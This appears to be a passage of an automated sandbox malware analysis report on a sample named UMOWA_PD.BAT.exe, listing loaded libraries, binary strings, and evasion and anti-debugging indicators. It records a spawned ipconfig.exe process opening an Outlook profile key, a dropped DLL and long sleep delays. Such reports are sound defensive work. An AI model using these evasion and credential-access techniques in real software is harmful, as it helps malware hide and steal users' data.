        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: UMOWA_PD.BAT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ipconfig.pdb source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000003.18849446171.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000003.18849446171.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: giLTwJlyLWpfb.exe, 00000003.00000000.15312438170.000000000009E000.00000002.00000001.01000000.00000007.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19979533628.000000000009E000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: wntdll.pdbUGP source: UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15298219117.00000000338F7000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15301885907.0000000033AAC000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15391899316.0000000003046000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15388516950.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: UMOWA_PD.BAT.exe, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15298219117.00000000338F7000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15301885907.0000000033AAC000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15391899316.0000000003046000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15388516950.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmp

        Data Obfuscation

        Source: Yara matchFile source: 00000000.00000002.15206197185.0000000005014000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.15388629452.00000000017D4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_6FE21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FE21BFF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_6FE230C0 push eax; ret 0_2_6FE230EE
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C908CD push ecx; mov dword ptr [esp], ecx2_2_33C908D6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032208CD push ecx; mov dword ptr [esp], ecx4_2_032208D6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F5212 push eax; ret 4_2_030F5214
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030ED25C pushad ; retf 4_2_030ED276
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030ED26D pushad ; retf 4_2_030ED276
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030E527D pushfd ; iretd 4_2_030E52A0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030ED2A3 pushfd ; ret 4_2_030ED2BE
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030E5101 push es; ret 4_2_030E5188
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030E5160 push es; ret 4_2_030E5188
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EC825 pushfd ; retf 4_2_030EC847
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EAF0E push ebx; iretd 4_2_030EAF12
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EB7EC push es; retf 4_2_030EB811
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030ECE71 push 00000021h; ret 4_2_030ECE7B
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030E66F0 pushad ; ret 4_2_030E66F1
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030E7515 push ebx; ret 4_2_030E7528
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F0D33 push FFFFFF88h; retf 4_2_030F0D3D
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EC4CD push edx; ret 4_2_030EC4CE

        Persistence and Installation Behavior

        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeFile created: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeAPI/Special instruction interceptor: Address: 54AEEF5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeAPI/Special instruction interceptor: Address: 1C6EEF5
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D144
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D764
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D324
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D364
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D004
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2FF74
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D864
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1763 rdtsc 2_2_33CD1763
        Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 9189Jump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeAPI coverage: 0.2 %
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 1.5 %
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 7464Thread sleep count: 121 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 7464Thread sleep time: -242000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 7464Thread sleep count: 9189 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 7464Thread sleep time: -18378000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe TID: 7536Thread sleep time: -85000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe TID: 7536Thread sleep count: 45 > 30Jump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe TID: 7536Thread sleep time: -67500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe TID: 7536Thread sleep count: 48 > 30Jump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe TID: 7536Thread sleep time: -48000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15299601778.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: giLTwJlyLWpfb.exe, 00000005.00000002.19980948559.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllwwz|
        Source: ipconfig.exe, 00000004.00000002.19059845738.0000000002B90000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.15684079593.000001DFD6736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeAPI call chain: ExitProcess graph end nodegraph_0-4908
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeAPI call chain: ExitProcess graph end nodegraph_0-4915
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1763 rdtsc 2_2_33CD1763
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_00401774 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,0_2_00401774
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_6FE21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FE21BFF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C963CB mov eax, dword ptr fs:[00000030h]2_2_33C963CB
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D143D5 mov eax, dword ptr fs:[00000030h]2_2_33D143D5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8E3C0 mov eax, dword ptr fs:[00000030h]2_2_33C8E3C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8C3C7 mov eax, dword ptr fs:[00000030h]2_2_33C8C3C7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC33D0 mov eax, dword ptr fs:[00000030h]2_2_33CC33D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC43D0 mov ecx, dword ptr fs:[00000030h]2_2_33CC43D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C91380 mov eax, dword ptr fs:[00000030h]2_2_33C91380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAF380 mov eax, dword ptr fs:[00000030h]2_2_33CAF380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F38A mov eax, dword ptr fs:[00000030h]2_2_33D4F38A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0C3B0 mov eax, dword ptr fs:[00000030h]2_2_33D0C3B0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C993A6 mov eax, dword ptr fs:[00000030h]2_2_33C993A6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C88347 mov eax, dword ptr fs:[00000030h]2_2_33C88347
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D10371 mov eax, dword ptr fs:[00000030h]2_2_33D10371
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E372 mov eax, dword ptr fs:[00000030h]2_2_33D0E372
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B360 mov eax, dword ptr fs:[00000030h]2_2_33C9B360
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE363 mov eax, dword ptr fs:[00000030h]2_2_33CCE363
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB237A mov eax, dword ptr fs:[00000030h]2_2_33CB237A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C89303 mov eax, dword ptr fs:[00000030h]2_2_33C89303
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAE310 mov eax, dword ptr fs:[00000030h]2_2_33CAE310
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F30A mov eax, dword ptr fs:[00000030h]2_2_33D4F30A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8E328 mov eax, dword ptr fs:[00000030h]2_2_33C8E328
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8E328 mov eax, dword ptr fs:[00000030h]2_2_33C8E328
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8E328 mov eax, dword ptr fs:[00000030h]2_2_33C8E328
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D63336 mov eax, dword ptr fs:[00000030h]2_2_33D63336
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB332D mov eax, dword ptr fs:[00000030h]2_2_33CB332D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC32C0 mov eax, dword ptr fs:[00000030h]2_2_33CC32C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC32C0 mov eax, dword ptr fs:[00000030h]2_2_33CC32C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB32C5 mov eax, dword ptr fs:[00000030h]2_2_33CB32C5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D632C9 mov eax, dword ptr fs:[00000030h]2_2_33D632C9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8D2EC mov eax, dword ptr fs:[00000030h]2_2_33C8D2EC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8D2EC mov eax, dword ptr fs:[00000030h]2_2_33C8D2EC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C872E0 mov eax, dword ptr fs:[00000030h]2_2_33C872E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C982E0 mov eax, dword ptr fs:[00000030h]2_2_33C982E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C982E0 mov eax, dword ptr fs:[00000030h]2_2_33C982E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C982E0 mov eax, dword ptr fs:[00000030h]2_2_33C982E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C982E0 mov eax, dword ptr fs:[00000030h]2_2_33C982E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E289 mov eax, dword ptr fs:[00000030h]2_2_33D0E289
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C97290 mov eax, dword ptr fs:[00000030h]2_2_33C97290
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C97290 mov eax, dword ptr fs:[00000030h]2_2_33C97290
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C97290 mov eax, dword ptr fs:[00000030h]2_2_33C97290
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB42AF mov eax, dword ptr fs:[00000030h]2_2_33CB42AF
